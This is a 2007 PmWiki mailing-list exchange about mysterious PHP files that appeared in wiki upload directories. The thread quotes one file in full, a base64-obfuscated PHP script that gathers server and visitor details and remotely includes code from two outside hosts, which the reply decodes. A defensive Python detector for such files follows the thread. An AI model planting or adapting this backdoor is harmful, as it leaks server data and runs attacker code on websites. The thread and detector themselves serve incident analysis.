[pmwiki-users] FW: Mysterious php file appears in upload directory

Peter K.H. Gragert p.k.h.gragert at skyaccess.nl
Sat Apr 28 12:09:31 CDT 2007


The base64 strings mean:
http://www3.rssnews.ws
http://www3.xmldata.info
All the SERVER-info of .. are given to: ... these http addresses ...(base 64
encoded)
PKHG

> -----Original message-----
> From: pmwiki-users-bounces at pmichaud.com [mailto:pmwiki-users-
> bounces at pmichaud.com] On behalf of Dr Fred C
> Sent: Saturday 28 April 2007 18:35
> To: PmWiki Users
> Subject: [pmwiki-users] Mysterious php file appears in upload directory
> 
> I went to upload a file to one of my wikis this morning and, while that
> went fine, I noticed a curious 43248.php file that had been uploaded to
> this upload directory, last night around 2:30 am.   I checked with my
> FTP program and quite a number of my various wikis had a similar php
> file in the uploads directories, and in the wiki.d directory -- always
> with a different # for the file name, always of the same size.
> 
> I downloaded it and it contained this info.
> 
> <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
> $_SERVER["SERVER_NAME"] :
> $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ?
> $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
> ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])
> ? $_SERVER["QUERY_STRING"] :
> $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
> $_SERVER["HTTP_REFERER"] :
> $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
> $_SERVER["HTTP_USER_AGENT"] :
> $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
> $_SERVER["REMOTE_ADDR"] :
> $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ?
> $_SERVER["SCRIPT_FILENAME"] :
> $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?
> $_SERVER["HTTP_ACCEPT_LANGUAGE"] :
> $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".ba
> se64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_enc
> ode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($
> i).".".base64_encode($j);
> if
> ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLnd
> z")."/?".$str))){}
> else
> {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmlu
> Zm8=")."/?".$str);}
> ?>
> 
> --------
> Any ideas on what is going on here?
> 
> --
> 
> Always, Dr Fred C
> drfredc at drfredc.com
> 
> 
> _______________________________________________
> pmwiki-users mailing list
> pmwiki-users at pmichaud.com
> http://www.pmichaud.com/mailman/listinfo/pmwiki-users
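
A triage sketch for files like the one quoted above, added here as an example and not part of the original thread: it undoes the mail quoting, decodes the string literals passed to `base64_decode()`, and reports any `include`/`require` whose decoded target is a remote URL. The function names are hypothetical and the sample is constructed with placeholder hosts.

```python
import base64
import binascii
import re

CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# include/require whose argument starts with a chain of base64_decode() calls
INCLUDE = re.compile(
    r'\b(?:include|require)(?:_once)?\b\s*\(?\s*'
    r'((?:base64_decode\([^)]*\)\s*\.\s*)*base64_decode\([^)]*\))')

def unwrap_quoted(text):
    """Strip leading '>' quote markers and rejoin lines the mailer hard-wrapped."""
    return "".join(re.sub(r'^>\s?', '', line) for line in text.splitlines())

def decode_literal(literal):
    """Decode one base64 string literal; None if it is not valid base64."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def find_remote_includes(php_source):
    """Return decoded include targets that turn out to be remote URLs."""
    hits = []
    for match in INCLUDE.finditer(php_source):
        parts = [decode_literal(lit) for lit in CALL.findall(match.group(1))]
        if not parts or None in parts:
            continue  # argument was not made only of decodable literals
        target = "".join(parts)
        if re.match(r'(?i)(?:https?|ftp)://', target):
            hits.append(target)
    return hits

def _enc(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample: same shape as the quoted file, mail-quoted and wrapped
# in the middle of a literal; the hosts are placeholders.
_H1, _H2 = _enc("first.example.invalid"), _enc("second.example.invalid")
SAMPLE = (
    '> <? error_reporting(0);$str=base64_encode($_SERVER["HTTP_HOST"]);\n'
    '> if\n'
    '> ((include(base64_decode("' + _enc("http://") + '").base64_decode("' + _H1[:12] + '\n'
    '> ' + _H1[12:] + '")."/?".$str))){}\n'
    '> else\n'
    '> {include(base64_decode("' + _enc("http://") + '").base64_decode("' + _H2 + '")."/?".$str);}\n'
    '> ?>\n'
)
print(find_remote_includes(unwrap_quoted(SAMPLE)))
```

Run over every `.php` file found in upload and data directories, a non-empty result marks a file that fetches and executes code from another host.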



